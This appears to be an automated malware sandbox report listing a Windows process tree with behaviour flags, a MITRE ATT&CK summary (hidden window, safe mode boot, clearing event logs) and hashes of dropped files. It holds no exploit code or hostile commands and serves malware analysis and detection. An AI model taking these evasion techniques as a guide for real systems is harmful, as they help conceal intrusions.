C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3752
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3936
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4780
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2456
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4376
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1440
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2576
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4656
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4332
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4116
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:3616
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3092
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:5912
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:5252
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2260
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:6068
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:5808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5804
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Hide Artifacts (1): Hidden Window (1)
- Impair Defenses (1): Safe Mode Boot (1)
- Indicator Removal (1): Clear Windows Event Logs (1)
- Modify Registry (1)
Downloads
-
Filesize
152B
MD5 ecf7ca53c80b5245e35839009d12f866
SHA1 a7af77cf31d410708ebd35a232a80bddfb0615bb
SHA256 882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687
SHA512 706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696
-
Filesize
152B
MD5 4dd2754d1bea40445984d65abee82b21
SHA1 4b6a5658bae9a784a370a115fbb4a12e92bd3390
SHA256 183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d
SHA512 92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1
-
Filesize
23KB
MD5 bc715e42e60059c3ea36cd32bfb6ebc9
SHA1 b8961b23c29b9769100116ba0da44f13a24a3dd4
SHA256 110ccd760150c6ac29c987ee2b8f7c56772036f6fe74ff2fb56c094849912745
SHA512 5c0edd336a6d892f0163aa183e5482313dd86f9f5b2d624b3c4529692d70720f4823808f10ee7870fd9368b24de752b343570419fd244c33ad2d9cc86007bedc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB
MD5 f27e039d6c62f7356a3cadc5470be709
SHA1 64a1351b0e75beee14e250a5c4deae621bfe9930
SHA256 6abaaac0fd883603e7e4bec7d353dda9f26d0cf51cc07a844b41083018a19631
SHA512 3a1007f1bb2df5e4416b70d890c5b1f5d9e0414e4ceb3508261904971b95ff5d2a732be1360915867ead225e708137271b56202a82aac9d6b08fcb8533c1452e
-
Filesize
670B
MD5 ad45889331850802a1ec5fe47d1af27a
SHA1 249bcfa895b0a81621582f2f0e3916d376c00000
SHA256 09699c10f679001c7c9918a0cb31c6f511a5ac23cba75352174070fa3e010e5c
SHA512 1df6bf3bb12691e1c8ea57f17b2ac34d91a3f7231ecbf22567bb4aef3d8ae323efd2820b8a5aa24e42950ee94129d794f612f3b68cd6b395845edc3a701081cf
-
Filesize
6KB
MD5 8649cb437c9a57054fb7c763b177cd91
SHA1 e6d013d346980f56e9cec0cad06442ca3fddd1b6
SHA256 569acf65537f342bfc19212624c77037f7d6fc92d1c12033ef04fb6405bce8c3
SHA512 174bcb3bd43fc89abfbb469d50db68b1aca90a07d0bf484b207cf59f61bcbd17463f446201f349c60e1030052d78f388b21c1bd34221f35f3ebbeefa5b2c6e08
-
Filesize
6KB
MD5 66b46eb8680e6d7baf988fda5511ecfb
SHA1 a463991c5f61b76d002be48d7bffd07905a87199
SHA256 845af2f1ded1e5648b41180b129e02e132814e1fd56553174ee9251a74742a43
SHA512 db2336a072162efe571542286816206fe947bfbae8b4638ea5e4d17f58233c2c79d84fe32242b500838e5bc3117c9e31548e912e290987295323941de87214b5
-
Filesize
5KB
MD5 73e368e883de9c1e0b737dab693b5e15
SHA1 4abe90ce224109b325bfa4cfc2a62b4a5b65c9aa
SHA256 fbc10417f6d690fa7dfde8805e22e1e021243f606ac45af0f8a534ea450d20d4
SHA512 333d1a48de1ddf411f3786d1673cad72945f5ce8c6621818007bdf7c4741ee5a5cece69b0896666405e35e4f6f1877f52b866d8fd2c6765107187533bb73fe41
-
Filesize
6KB
MD5 f4e8198fa1c1f2de94f4c9f6184bdade
SHA1 13d2b555fdc882135eee266fea79436e533aa37e
SHA256 d09dea5845fd6f48d171eca7850d6be697d26f9d420fb32c1998d788e9134099
SHA512 7a320334c22902813148c036d09e5fdc449c321bfe74209b9679ac350831e893412f5e3cc5f6262fe798d58d627d7beb7cf736e4d257398115ee173968138d89
-
Filesize
6KB
MD5 4e4a025c7932028937a082596a5875c2
SHA1 11aee9076dc726460c4ba9d565fff81b39362565
SHA256 63122e9d8f65de05ba4492c80e0961f343ec60ecf2ee1442e0a70350bedfee07
SHA512 92b7298f26dd019ed99bb1ddce310e1fb70f3c70b1546f47df3b7e14e4fbe56b9c26862c6d960c5339e239fad098f5f99ad5b1f69f338dc0e7ae8c2e6eac472e
-
Filesize
1KB
MD5 7113d3645ce30eeb6fa1f8bac2423d8d
SHA1 ea8b1e1167769e2b7045479e838699ad13760b21
SHA256 49d30af29fa21e7c1380056be527457b9777f0e989e23445eb7c29e0c0303290
SHA512 7dcf90ef4ae78549fde941729306c74265f9b66806d296757f9f3b5b464cc64e97b13ce3a25dfa009339bce3f92d06cad52f09b1434c04027d4a48d1e1261654
-
Filesize
1KB
MD5 43a26f6a50954ecebf941a96b5dccdfb
SHA1 fa9764bc0b87096c16469a90f26e57c25bcafdde
SHA256 c54976d6af4855948cdfc093a54af4954327631f671759ad12aa8d88f16661b8
SHA512 f1a92c03a745e204f707c6db88cae65af797b0cdac8c353805d77232247b9719eba2a82920a2d14722a9d4cce9ee2fa380eabfbaee64b51c39485b2d31b84c5b
-
Filesize
1KB
MD5 17983d1ba39860f72d5f6a7a33a2efde
SHA1 adf3c447dea31c3f4d919017d40fa7ffd4021a6c
SHA256 2c63442bfbedf818631793a5839f15871c7b115a40b64f6661a49bb2b815cab1
SHA512 fa8faa15858516c04c975749bf80b715ffb72005adca44375af9d2bbfb9ceb96cea83529628f9e2fd59b65c73123ab668fdcafe70fc7b0ba92c91709b8c32279
-
Filesize
1KB
MD5 269cd4db9b3651fe1028bac11faab22e
SHA1 1f616ce6a040281b59f7d319a73d95ac6bb3f5b9
SHA256 082138787a5ef2469379c63408c5f3d5a5d02d799443681b23542870be8cf7b8
SHA512 87fe5e67d1e1d4e135ce6fcb97edf52c8c3c407d3217d9a7690815b0d2321b4507db768af7db18ab371f8f0fc77c85dfc06feb78a58928caabe3154a93aff06d
-
Filesize
1KB
MD5 dcf6eeb4265b1433d03a2aca619a23a3
SHA1 451c1eb3249bfb26b0958e99f0b62a3367fa0979
SHA256 61c767262c25fcd9ebb789bff2c9f4625dbbcfa562b61bae83af6ef9abb5cb9a
SHA512 e16a7a99793521ed9ce21708dab284a7dfb84741c2612cd6ac4899c99af317558b1fb6b434ee16c52c85593e9ed2276cf861538d660786c27cedfefde02c002e
-
Filesize
1KB
MD5 4252fb4398ce6e7faa30268161078cc5
SHA1 e6a4597cbf341c9cae9625c4ad2140472e547f4b
SHA256 c2b101ca2617aa6ccd615b6bba0d2a753605328c3ded29948f3467e7c0f9e680
SHA512 f5805970008b6783fcb2ad7a2762849a7f4ff4d4d78c6e31eed512b2175a183f2ce2398a6cc6011a68ffd46125a7d7ae671ff6124bc63528f8b9c48b37cb23ac
-
Filesize
16B
MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
12KB
MD5 1edc0d9c9ef7bba60c20416feb8c0ee2
SHA1 24c0304b3ccfc98197e3b71d7c07ac82aad2e3f4
SHA256 260bbe852ffe23add2478c1a21afa43ad288f47cc35274d11500ac70da784b2a
SHA512 2f3c77f98c5248ba94e49dc998398eeb653ebb30ac9a4eb05f6f95546453df350de50db52d115454cc9374af64ea3cf2d2400be04b56acb477372db1df09922c
-
Filesize
11KB
MD5 a1856df5dfca13951a4645675a4b9a9f
SHA1 a1296dae622b95e64f1bddfa21a57be02ce105e5
SHA256 6b65213164bb73f48953445747fac80fbca8531cf3ce1393818d54b623e2dddb
SHA512 8ae40fe9a5fd4223aa72e87f6157f103411fa64b9694e38c3fd1689e9b271c1e2625d8bb9f47d38370b179173085c4b8ddd2e22d0f32d4b3d820fc1c914dc1f4
-
Filesize
12KB
MD5 251b2d23476483f45acc1c0c63be8279
SHA1 2082401b27570854cb72196f65502e1292492012
SHA256 78336aa704e875683d43db9218d622bba3a10af4df3ec9de40541867ef4aaf64
SHA512 42fdaaa9a6c82516ba5ad66d7dd5fc02a0ff8ece6f09b758bb967ebd7cae902ce89a6fc2a7a85c5e5ad5bf3387993afac29f611b291f89624a253650eb509917
-
Filesize
12KB
MD5 b5cd285fc8b5a6a506591ff7fcc494f5
SHA1 ec019f92a179e95cbbc8487649d9202206e44b38
SHA256 00414df30c4605d726eab6e9cf4e89add0c5c622770a86056bc32f92ab8292b9
SHA512 8c89c0a8427ad04685eb4692eefdfc4b4a24be62a948a97dbfd2e5953e3496ca978ddaa1766d1a719fce0c76a4982460df39076a92ee05ec841a250e5ab86ac0
-
Filesize
11KB
MD5 cf9cc538aa6d54a205151271786a4b61
SHA1 49231446fee0c225fc5191b0b3a93c25ce410428
SHA256 87ea5babe568e69243a6b62f19f6b2841c2200bb32a0c508be9c6c9fdb376659
SHA512 74fc270b2d9a1a5efd140c068153f4190b6364992496cd8f1bf5ae6cf0d1919ab8fe9cae1e43590b950f8828f81db98bb3ee6dd977054abc8cd772a3b9a2113f
-
Filesize
53KB
MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
Filesize
15KB
MD5 abbe4777c29b4eba080805101461f2d9
SHA1 99026afec3a30aba80df7038edd8f6e896b117fc
SHA256 d014c800f5ac3efa99bac650aaee2cfe56ba23bfbc064958d987ee6b492bf410
SHA512 f5b18e900b4b430faa97b4a7e0a410a18f740f8dcdf75ab8217f105612b2ba518734e889b4849dca89d06e0fc0fb3de3f875c5696e3612f6073fc90aa3583a41
-
Filesize
9.9MB
MD5 a25e351949d2107c6eb1dfc027f4821f
SHA1 3d98b08cc3d40827bd37b71bbdae66359a0a16d5
SHA256 d439360bc426c4b5da9d2abc7212320c5c63b1ee99a78fb2d6433c946662558b
SHA512 98d2f2fb189193c06c08d76a3e9316516064fcae354bfd4c7e1ff2de9146c5e36edb8efd8f073a8290902e4dd4002efe151496f931326f25445a17389ced129d
-
Filesize
4.0MB
MD5 5df955c485dcd3aa11e3103aff15f658
SHA1 efd3485a4e6a2bebc9ce308baeef43ceb3928800
SHA256 c5ff26d788b29bf1e9eba1132faaf0f111b9c3c8b3611ed307b6285abc9f25e0
SHA512 b548448cc5f59d941516ccae16275a95b2c6fb85e4373fc0b1506eb82eec1be6941091071ebc6c69c07e4a22cfde46f2959da9435a4438f3172779892b415b95
-
Filesize
8.3MB
MD5 e91ce036c82fd4f847130160df164504
SHA1 f7d2b0f70451fb3974be4b90c00b36fb265017be
SHA256 24b71f8c5eec18dd6623348f81e57d9c0ba04086cd5a7336d426f2e093cdb49d
SHA512 e5a892419b1552a1374a2d5670bc00ec6505342a740edad6c0520b744aaa522124777d11175251fdfbed3cdd1bf7da1a016b3309ce51052841dc7e57efabfd02
-
Filesize
283KB
MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4